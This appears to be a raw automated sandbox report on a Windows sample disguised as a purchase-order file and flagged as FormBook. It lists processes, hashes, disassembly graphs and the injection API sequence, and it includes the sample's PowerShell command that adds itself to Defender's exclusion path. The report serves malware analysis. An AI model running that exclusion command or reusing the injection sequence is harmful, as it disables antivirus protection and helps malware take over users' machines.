                                                                                        x-request-id: 0f0e87ad-3e35-4e5e-9e73-6768b65a0568
                                                                                        cache-control: no-store, max-age=0
                                                                                        accept-ch: sec-ch-prefers-color-scheme
                                                                                        critical-ch: sec-ch-prefers-color-scheme
                                                                                        vary: sec-ch-prefers-color-scheme
                                                                                        x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yveCLs2WyVfzFDf1GOwUFtqq/OwBkJNvB35PkBrb6MkhKrTK5N0OZqAue9eGyMW9JZ8Y5rM5O/xMgvJ0N0t3dw==
                                                                                        set-cookie: parking_session=0f0e87ad-3e35-4e5e-9e73-6768b65a0568; expires=Thu, 12 Dec 2024 21:14:39 GMT; path=/
                                                                                        connection: close


                                                                                        Target ID:1
                                                                                        Start time:15:52:47
                                                                                        Start date:12/12/2024
                                                                                        Path:C:\Users\user\Desktop\PO 1202495088.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\PO 1202495088.exe"
                                                                                        Imagebase:0xd20000
                                                                                        File size:863'232 bytes
                                                                                        MD5 hash:49095D080A201256F23914317E65EF4B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:2
                                                                                        Start time:15:53:02
                                                                                        Start date:12/12/2024
                                                                                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO 1202495088.exe"
                                                                                        Imagebase:0xf00000
                                                                                        File size:433'152 bytes
                                                                                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:3
                                                                                        Start time:15:53:02
                                                                                        Start date:12/12/2024
                                                                                        Path:C:\Windows\System32\conhost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                        Imagebase:0x7ff6c18e0000
                                                                                        File size:875'008 bytes
                                                                                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:high
                                                                                        Has exited:true

                                                                                        Target ID:4
                                                                                        Start time:15:53:02
                                                                                        Start date:12/12/2024
                                                                                        Path:C:\Users\user\Desktop\PO 1202495088.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Users\user\Desktop\PO 1202495088.exe"
                                                                                        Imagebase:0x960000
                                                                                        File size:863'232 bytes
                                                                                        MD5 hash:49095D080A201256F23914317E65EF4B
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1464570904.0000000001320000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.1462621787.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:low
                                                                                        Has exited:true

                                                                                        Target ID:5
                                                                                        Start time:15:53:11
                                                                                        Start date:12/12/2024
                                                                                        Path:C:\Windows\System32\svchost.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                        Imagebase:0x7ff7f78b0000
                                                                                        File size:57'360 bytes
                                                                                        MD5 hash:F586835082F632DC8D9404D83BC16316
                                                                                        Has elevated privileges:true
                                                                                        Has administrator privileges:true
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:false

                                                                                        Target ID:12
                                                                                        Start time:15:53:30
                                                                                        Start date:12/12/2024
                                                                                        Path:C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s
                                                                                        Imagebase:0x140000000
                                                                                        File size:16'696'840 bytes
                                                                                        MD5 hash:731FB4B2E5AFBCADAABB80D642E056AC
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:false

                                                                                        Target ID:13
                                                                                        Start time:15:53:31
                                                                                        Start date:12/12/2024
                                                                                        Path:C:\Windows\SysWOW64\cttune.exe
                                                                                        Wow64 process (32bit):true
                                                                                        Commandline:"C:\Windows\SysWOW64\cttune.exe"
                                                                                        Imagebase:0xdd0000
                                                                                        File size:72'192 bytes
                                                                                        MD5 hash:E515AF722F75E1A5708B532FAA483333
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Yara matches:
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.5166449084.0000000004810000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.5166555178.0000000004860000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                        Reputation:moderate
                                                                                        Has exited:false

                                                                                        Target ID:14
                                                                                        Start time:15:53:56
                                                                                        Start date:12/12/2024
                                                                                        Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                                        Wow64 process (32bit):false
                                                                                        Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                                        Imagebase:0x7ff6038f0000
                                                                                        File size:597'432 bytes
                                                                                        MD5 hash:FA9F4FC5D7ECAB5A20BF7A9D1251C851
                                                                                        Has elevated privileges:false
                                                                                        Has administrator privileges:false
                                                                                        Programmed in:C, C++ or other language
                                                                                        Reputation:moderate
                                                                                        Has exited:true

                                                                                          Execution Graph

                                                                                          Execution Coverage:18.6%
                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                          Signature Coverage:4.2%
                                                                                          Total number of Nodes:165
                                                                                          Total number of Limit Nodes:7

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Tegq$Tegq$z^I
                                                                                          • API String ID: 0-723423495
                                                                                          • Opcode ID: f571d2ad4a76712ccc08eee2a705a631009324f122c7c5563cde26b6c1b16dd5
                                                                                          • Instruction ID: 0d8c93a460cebac6d5f4709fee84146860304d8bc105b51b861f69aaa5b1278a
                                                                                          • Opcode Fuzzy Hash: f571d2ad4a76712ccc08eee2a705a631009324f122c7c5563cde26b6c1b16dd5
                                                                                          • Instruction Fuzzy Hash: 59C11775E012098FCB08DFAAC980ADDFBB2FF89300F28956AD415AB354D735AA55CF50

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Tegq$Tegq$z^I
                                                                                          • API String ID: 0-723423495
                                                                                          • Opcode ID: 5a43bb44397ec66e72061ae604f8289b4ebada149beaf06b1f16d1a0a166327a
                                                                                          • Instruction ID: 03d19f02431e1eb1980364e04196b84fbeb7ef4531d566faab0159eca49b6451
                                                                                          • Opcode Fuzzy Hash: 5a43bb44397ec66e72061ae604f8289b4ebada149beaf06b1f16d1a0a166327a
                                                                                          • Instruction Fuzzy Hash: D891B2B4E012198FDB08CFAAC98469EFBB2FF88300F24956AD415BB368D7349945CF54

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ry$ry
                                                                                          • API String ID: 0-883804406
                                                                                          • Opcode ID: 86f0b38c86be283e660a629651aecc346e0238d06c31cfa80cd052f1518f3263
                                                                                          • Instruction ID: a38f710a64702de8c7844b3e550ec3e8125510b6fad5623dc2cb94508f10a59b
                                                                                          • Opcode Fuzzy Hash: 86f0b38c86be283e660a629651aecc346e0238d06c31cfa80cd052f1518f3263
                                                                                          • Instruction Fuzzy Hash: A9F18C71E02209EFCB14EF95DD828AEFBB2FF89344B248559E401A7215D335EA52CF91

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ry$ry
                                                                                          • API String ID: 0-883804406
                                                                                          • Opcode ID: 46fa76db3be985684abda971f551585544c7394fee34e23d7237a0432f761129
                                                                                          • Instruction ID: 4ad78d59615baa0cb4a8f35558a01d699b01212e041bb0e6ac9ed31a8aee525c
                                                                                          • Opcode Fuzzy Hash: 46fa76db3be985684abda971f551585544c7394fee34e23d7237a0432f761129
                                                                                          • Instruction Fuzzy Hash: C1E19C71E02219EFCB14DF95D8818AEFBB2FF89304B248959E406A7315D335EA52CF91

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ry$ry
                                                                                          • API String ID: 0-883804406
                                                                                          • Opcode ID: 5f19e97dedc851416a887b8089433fba6e460c014ed4a8082ee2c4ccb08b502c
                                                                                          • Instruction ID: ef5c15fe75ea410004ade74762d1d8858f9f9b9863b43989e245bed2921a3a69
                                                                                          • Opcode Fuzzy Hash: 5f19e97dedc851416a887b8089433fba6e460c014ed4a8082ee2c4ccb08b502c
                                                                                          • Instruction Fuzzy Hash: 05C16C70E0621ADFCB14CFA9D4858AEFBB2FF89304B24C959D416A7214D734EA42CF94

                                                                                          Control-flow Graph

                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: TuA$UC;"
                                                                                          • API String ID: 0-2071649361
                                                                                          • Opcode ID: 176b0c9d44d7c797351dafca1ab97102ed1ccd2f93b217b693c896b787f9c635
                                                                                          • Instruction ID: 463a76c698e9d6ab2f043e45931f43db2885640b88b82f86f6af6ddd0654ccf1
                                                                                          • Opcode Fuzzy Hash: 176b0c9d44d7c797351dafca1ab97102ed1ccd2f93b217b693c896b787f9c635
                                                                                          • Instruction Fuzzy Hash: 95910571E05619EFDB08CFA6E4809DEFBB2EF89310F14982AE419BB264D7319542CF40
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 5=6
                                                                                          • API String ID: 0-2897083178
                                                                                          • Opcode ID: 96d5beee539515e0048daed932c2b8eea0118e8f641518648ab96928ecb175c1
                                                                                          • Instruction ID: ceb07d89c47f42530e12d96d7d9855292f606adba047308b0f0d50cddf25d6e4
                                                                                          • Opcode Fuzzy Hash: 96d5beee539515e0048daed932c2b8eea0118e8f641518648ab96928ecb175c1
                                                                                          • Instruction Fuzzy Hash: 83816E74E0A24A9FCB08CFA5D8404AEFFF2FF4A200F1498AAD055E7265D7789A05CF51
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 349 75f6edd-75f71f4 ResumeThread 353 75f71fd-75f723f 349->353 354 75f71f6-75f71fc 349->354 354->353
                                                                                          APIs
                                                                                          • ResumeThread.KERNELBASE(?), ref: 075F71DE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 359 75f7c76-75f7d11 362 75f7d5a-75f7d82 359->362 363 75f7d13-75f7d2a 359->363 366 75f7dc8-75f7e1e 362->366 367 75f7d84-75f7d98 362->367 363->362 368 75f7d2c-75f7d31 363->368 377 75f7e64-75f7f5b CreateProcessA 366->377 378 75f7e20-75f7e34 366->378 367->366 375 75f7d9a-75f7d9f 367->375 369 75f7d54-75f7d57 368->369 370 75f7d33-75f7d3d 368->370 369->362 372 75f7d3f 370->372 373 75f7d41-75f7d50 370->373 372->373 373->373 376 75f7d52 373->376 379 75f7dc2-75f7dc5 375->379 380 75f7da1-75f7dab 375->380 376->369 396 75f7f5d-75f7f63 377->396 397 75f7f64-75f8049 377->397 378->377 385 75f7e36-75f7e3b 378->385 379->366 381 75f7daf-75f7dbe 380->381 382 75f7dad 380->382 381->381 386 75f7dc0 381->386 382->381 387 75f7e5e-75f7e61 385->387 388 75f7e3d-75f7e47 385->388 386->379 387->377 390 75f7e4b-75f7e5a 388->390 391 75f7e49 388->391 390->390 392 75f7e5c 390->392 391->390 392->387 396->397 409 75f804b-75f804f 397->409 410 75f8059-75f805d 397->410 409->410 413 75f8051 409->413 411 75f805f-75f8063 410->411 412 75f806d-75f8071 410->412 411->412 414 75f8065 411->414 415 75f8073-75f8077 412->415 416 75f8081-75f8085 412->416 413->410 414->412 415->416 417 75f8079 415->417 418 75f80bb-75f80c6 416->418 419 75f8087-75f80b0 416->419 417->416 423 75f80c7 418->423 419->418 423->423
                                                                                          APIs
                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 075F7F3F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 424 75f7c78-75f7d11 426 75f7d5a-75f7d82 424->426 427 75f7d13-75f7d2a 424->427 430 75f7dc8-75f7e1e 426->430 431 75f7d84-75f7d98 426->431 427->426 432 75f7d2c-75f7d31 427->432 441 75f7e64-75f7f5b CreateProcessA 430->441 442 75f7e20-75f7e34 430->442 431->430 439 75f7d9a-75f7d9f 431->439 433 75f7d54-75f7d57 432->433 434 75f7d33-75f7d3d 432->434 433->426 436 75f7d3f 434->436 437 75f7d41-75f7d50 434->437 436->437 437->437 440 75f7d52 437->440 443 75f7dc2-75f7dc5 439->443 444 75f7da1-75f7dab 439->444 440->433 460 75f7f5d-75f7f63 441->460 461 75f7f64-75f8049 441->461 442->441 449 75f7e36-75f7e3b 442->449 443->430 445 75f7daf-75f7dbe 444->445 446 75f7dad 444->446 445->445 450 75f7dc0 445->450 446->445 451 75f7e5e-75f7e61 449->451 452 75f7e3d-75f7e47 449->452 450->443 451->441 454 75f7e4b-75f7e5a 452->454 455 75f7e49 452->455 454->454 456 75f7e5c 454->456 455->454 456->451 460->461 473 75f804b-75f804f 461->473 474 75f8059-75f805d 461->474 473->474 477 75f8051 473->477 475 75f805f-75f8063 474->475 476 75f806d-75f8071 474->476 475->476 478 75f8065 475->478 479 75f8073-75f8077 476->479 480 75f8081-75f8085 476->480 477->474 478->476 479->480 481 75f8079 479->481 482 75f80bb-75f80c6 480->482 483 75f8087-75f80b0 480->483 481->480 487 75f80c7 482->487 483->482 487->487
                                                                                          APIs
                                                                                          • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 075F7F3F
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateProcess
                                                                                          • String ID:
                                                                                          • API String ID: 963392458-0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 488 75f78d9-75f794b 491 75f794d-75f795f 488->491 492 75f7962-75f79c9 WriteProcessMemory 488->492 491->492 494 75f79cb-75f79d1 492->494 495 75f79d2-75f7a24 492->495 494->495
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 075F79B3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 500 75f78e0-75f794b 502 75f794d-75f795f 500->502 503 75f7962-75f79c9 WriteProcessMemory 500->503 502->503 505 75f79cb-75f79d1 503->505 506 75f79d2-75f7a24 503->506 505->506
                                                                                          APIs
                                                                                          • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 075F79B3
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessWrite
                                                                                          • String ID:
                                                                                          • API String ID: 3559483778-0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 511 75f77b0-75f77b4 512 75f77b6-75f782e 511->512 513 75f7775-75f7786 511->513 516 75f7835-75f7878 VirtualAllocEx 512->516 513->511 517 75f787a-75f7880 516->517 518 75f7881-75f78cb 516->518 517->518
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 075F7862
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 523 75f7a38-75f7b08 ReadProcessMemory 527 75f7b0a-75f7b10 523->527 528 75f7b11-75f7b63 523->528 527->528
                                                                                          APIs
                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 075F7AF2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessRead
                                                                                          • String ID:
                                                                                          • API String ID: 1726664587-0

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 533 75f7a40-75f7b08 ReadProcessMemory 536 75f7b0a-75f7b10 533->536 537 75f7b11-75f7b63 533->537 536->537
                                                                                          APIs
                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 075F7AF2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: MemoryProcessRead
                                                                                          • String ID:
                                                                                          • API String ID: 1726664587-0

                                                                                          Control-flow Graph

                                                                                          control_flow_graph 542 75f77b8-75f7878 VirtualAllocEx 545 75f787a-75f7880 542->545 546 75f7881-75f78cb 542->546 545->546
                                                                                          APIs
                                                                                          • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 075F7862
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 4275171209-0
                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 075F72FF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          APIs
                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 030EAEA7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          APIs
                                                                                          • VirtualProtect.KERNELBASE(?,?,?,?), ref: 030EAEA7
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: ProtectVirtual
                                                                                          • String ID:
                                                                                          • API String ID: 544645111-0
                                                                                          APIs
                                                                                          • Wow64SetThreadContext.KERNEL32(?,?), ref: 075F72FF
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: ContextThreadWow64
                                                                                          • String ID:
                                                                                          • API String ID: 983334009-0
                                                                                          APIs
                                                                                          • ResumeThread.KERNELBASE(?), ref: 075F71DE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1117957948.00000000075F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 075F0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_75f0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID: ResumeThread
                                                                                          • String ID:
                                                                                          • API String ID: 947044025-0
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: {#L
                                                                                          • API String ID: 0-1361971085
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: l|
                                                                                          • API String ID: 0-1955549514
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 98R
                                                                                          • API String ID: 0-576591972
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: w7e^
                                                                                          • API String ID: 0-1657886525
                                                                                          • Opcode ID: 069994422da2a0df95c922d93ca697f10e9ee8c38ec55ecc54e94971f3f7d193
                                                                                          • Instruction ID: 07fee59c1558551921de1b6d6c887156f2003bae46848bd88ed53754a2fb5cfe
                                                                                          • Opcode Fuzzy Hash: 069994422da2a0df95c922d93ca697f10e9ee8c38ec55ecc54e94971f3f7d193
                                                                                          • Instruction Fuzzy Hash: C94137B2E05259DFEB08CFAAC8406EEFBB1FB89201F14996AC415B7244D33946428F59
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: w7e^
                                                                                          • API String ID: 0-1657886525
                                                                                          • Opcode ID: 7168b50e4fc1406ac4a0d79780509db6e7f5d820dfdce5545e29740c1eaf9b1d
                                                                                          • Instruction ID: c49c476f201e444aff7838cd540d1edd10f1f160f22047c5d15c93302be8dae5
                                                                                          • Opcode Fuzzy Hash: 7168b50e4fc1406ac4a0d79780509db6e7f5d820dfdce5545e29740c1eaf9b1d
                                                                                          • Instruction Fuzzy Hash: F441F7B5E06219DFDF08CFAAC9406EEFBB1FB89201F14996AC416B7254D3394642CF58
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000001.00000002.1113804175.00000000030E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 030E0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_1_2_30e0000_PO 1202495088.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0ni
                                                                                          • API String ID: 0-1488673370
                                                                                          • Opcode ID: d44e13c3577c25c3ed3ed173e849121b503c1e3bd5f81b69a92cd8c36f5e6559
